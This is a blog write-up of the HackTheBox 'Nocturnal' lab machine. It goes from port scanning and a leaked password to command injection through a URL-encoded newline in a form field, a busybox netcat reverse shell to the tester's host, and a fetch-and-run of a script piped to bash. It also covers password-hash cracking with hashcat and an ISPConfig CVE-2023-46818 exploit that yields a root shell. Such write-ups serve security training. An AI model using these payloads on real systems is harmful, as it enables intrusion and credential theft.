xsspresso
xsspresso
WriteupsHTB — Nocturnal
WebEasyLinux

HTB — Nocturnal

ISP file manager path traversal leaks app config with credentials. ISPConfig adduser API abuse leads to root.

May 24, 2025HackTheBox
#Path Traversal#ISPConfig#Config Disclosure

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-23 01:54 EDT
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 43.11% done; ETC: 01:55 (0:00:17 remaining)
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 45.67% done; ETC: 01:55 (0:00:17 remaining)
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.28% done; ETC: 01:55 (0:00:02 remaining)
Nmap scan report for 10.10.11.64
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/23%OT=22%CT=1%CU=43154%PV=Y%DS=2%DC=T%G=Y%TM=6830
OS:0DCD%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(SP=106%GCD=2%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M552ST11NW7%O2=M552S
OS:T11NW7%O3=M552NNT11NW7%O4=M552ST11NW7%O5=M552ST11NW7%O6=M552ST11)WIN(W1=
OS:FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=
OS:M552NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)
OS:T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=
OS:Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G
OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   25.12 ms 10.10.14.1
2   26.12 ms 10.10.11.64

80

sh
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/

txt
Dear Amanda,
 
Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.
 
The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.
 
Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.
 
  
 
Yours sincerely,
 
Nocturnal's IT team
  • login with amanda creds

sh
test%0abash%09-c%09"wget%09http://10.10.14.9"
  • %0a this is new line \n
  • %09 this is tab \t

use busybox reverse shell

sh
busybox nc 10.10.14.9 80 -e bash
sh
password=test%0abash%09-c%09"busybox%09nc%0910.10.14.9%0980%09-e%09bash"&backup=
sh
rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.64] 39562
whoami
www-data
sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
sh
www-data@nocturnal:~/nocturnal_database$ ls
ls
nocturnal_database.db
www-data@nocturnal:~/nocturnal_database$ file nocturnal_database.db
file nocturnal_database.db
nocturnal_database.db: SQLite 3.x database, last written using SQLite version 3031001
sh
www-data@nocturnal:~/nocturnal_database$ which sqlite3
which sqlite3
/usr/bin/sqlite3
sh
www-data@nocturnal:~/nocturnal_database$ which sqlite3
sh
sqlite> .tables
.tables
uploads  users
sh
sqlite> select * from users;
select * from users;
1|admin|d725aeba...
2|amanda|df8b20aa...
4|tobias|55c82b1c...
6|kavi|f38cde16...
7|e0Al5|101ad454...
8|test|098f6bcd...
  • hashes.txt
txt
d725aeba...
df8b20aa...
55c82b1c...
f38cde16...
101ad454...
098f6bcd...
sh
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
 
55c82b1c...:slowmotionapocalypse

creds

sh
tobias:slowmotionapocalypse
sh
www-data@nocturnal:~/nocturnal.htb$ su tobias
su tobias
Password: slowmotionapocalypse
 
tobias@nocturnal:/var/www/nocturnal.htb$ whoami
whoami
tobias

user.txt

sh
tobias@nocturnal:~$ ls
user.txt
tobias@nocturnal:~$ cat user.txt
a5fccc5b...

priv esc

sh
tobias@nocturnal:/var/www$ ls
html  ispconfig  nocturnal_database  nocturnal.htb  php-fcgi-scripts
sh
tobias@nocturnal:/var/www$ netstat -tunlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*
sh
tobias@nocturnal:/var/www$ curl http://10.10.14.9/linpeas.sh | bash
sh
ssh -L 8081:localhost:8080 tobias@10.10.11.64
  • need to use private browser

ISPCONFIG

  • creds work admin:slowmotionapocalypse

https://github.com/bipbopbup/CVE-2023-46818-python-exploit/blob/main/exploit.py

sh
python3 exploit.py http://127.0.0.1:8081/ admin slowmotionapocalypse
[+] Target URL: http://127.0.0.1:8081/
[+] Logging in with username 'admin' and password 'slowmotionapocalypse'
[+] Injecting shell
[+] Launching shell
 
ispconfig-shell# whoami
root

root.txt

sh
ispconfig-shell# cat /root/root.txt 
117e9eab...

Up next

EasyMay 2025

HTB — Fluffy

CVE-2025-24071 abuses .searchConnector-ms files to capture NTLMv2 hashes. Relay attack and ADCS ESC4 escalate to Domain Admin.

Read writeup
EasyMay 2025

HTB — Planning

Grafana SSRF pivots to an internal Grafana instance. Credential reuse for SSH, then environment variable injection via root cron.

Read writeup
MediumSep 2025

Amazon CTF

Multi-challenge CTF covering AI chatbot prompt injection, LLM priority bypass, web vulnerabilities, and information disclosure across several themed web apps.

Read writeup